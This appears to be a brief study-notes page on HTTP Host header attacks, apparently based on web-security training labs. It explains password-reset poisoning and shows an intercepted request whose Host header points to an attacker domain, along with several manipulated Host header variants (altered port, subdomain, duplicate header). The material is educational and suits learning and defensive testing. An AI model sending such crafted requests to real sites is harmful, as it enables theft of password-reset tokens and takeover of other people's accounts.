SECURITY

  minte9
REMEMBERS




Last update:   10-05-2022

HTTP

The HTTP Host Header is a mandatory request header as of HTTP/1.1
 
# GET /home HTTP/1.1
# Host: web-security-academy.net/
# User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;

<a href="https://_SERVER['HOST']/support">Contact support</a>

Email

Some users carelessly click on any links in emails.
 
# Password reset email

Sent:     2022-05-01 15:03:47 +0000
From:     "No reply" <web-security-academy.net>
To:       "wiener" <wiener@web-security-academy.net>
Subject:  Account recovery

Hello!
Please follow the link below to reset your password.

https://web-security-academy.net/
forgot-password?token=cjA5K7uMV7EJoZW05fJjgApuphV6pNKQ

Intercept

An can intercept the resulting HTTP request and modify the Host header.
 
# Burp Intercept

GET /email HTTP/1.1
Host: hacker-exploit.net # Look Here
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;

# If the victim clicks this link ...
# or it is fetched  by an antivirus scanner ... 
# the password reset token will be delivered to the attacker's server.

Identify

Modify the Host header and still reach the target application with your request.
 
# Modify host
GET /example HTTP/1.1
Host: exploit-website.com # Look Here

# Modify port
GET /example HTTP/1.1
Host: vulnerable-website.com:9999

# Modify subdomain
GET /example HTTP/1.1
Host: hacked.vulnerable-website.com

# Duplicate host
GET /example HTTP/1.1
Host: vulnerable-website.com
Host: exploit-website.com

Questions    
Cross side scripting
        A B C D E F
🔔
1/1